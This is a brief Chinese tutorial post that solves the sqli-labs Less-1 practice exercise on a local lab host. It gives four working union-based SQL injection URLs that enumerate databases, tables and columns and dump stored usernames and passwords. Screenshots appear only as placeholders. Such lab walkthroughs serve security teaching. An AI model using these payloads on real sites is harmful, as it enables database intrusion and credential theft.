SQL注入-手工注入方法

庫名

http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
image.png

表名

http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

不使用雙引號也可直接使用十六進(jìn)制(0x****)

image.png

列名

http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
image.png

數(shù)據(jù)

http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(username,'~',password) from security.users),3 --+
image.png

核心語法

image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • SQL注入的優(yōu)化和繞過: 0x00 ~ 介紹 SQL注入毫無疑問是最危險(xiǎn)的Web漏洞之一,因?yàn)槲覀儗⑺行畔⒍即鎯?..
    CanMeng閱讀 1,201評論 0 1
  • 第一部分 初識Python語言 第1章 程序設(shè)計(jì)基本方法 1.1 計(jì)算機(jī)的概念 計(jì)算機(jī)是根據(jù)指令操作數(shù)據(jù)的設(shè)備,具...
    不脫發(fā)的程序員閱讀 1,218評論 0 1
  • 一、sql注入原理 SQL 注入就是指 web 應(yīng)用程序?qū)τ脩糨斎氲臄?shù)據(jù)合法性沒有過濾或者是判斷,前端傳入的參數(shù)是...
    卿酌南燭_b805閱讀 4,363評論 0 2
  • mysql數(shù)據(jù)庫結(jié)構(gòu): SQL層的功能: 判斷語法,語句,語義數(shù)據(jù)庫對象授權(quán)情況判斷,授權(quán)失敗不繼續(xù)解析(解析器)...
    shadowflow閱讀 418評論 0 0
  • 基于《Python語言程序設(shè)計(jì)基礎(chǔ)(第2版)》 第一部分 初識Python語言 第1章 程序設(shè)計(jì)基本方法 1.1 ...
    柄志閱讀 27,793評論 4 44

友情鏈接更多精彩內(nèi)容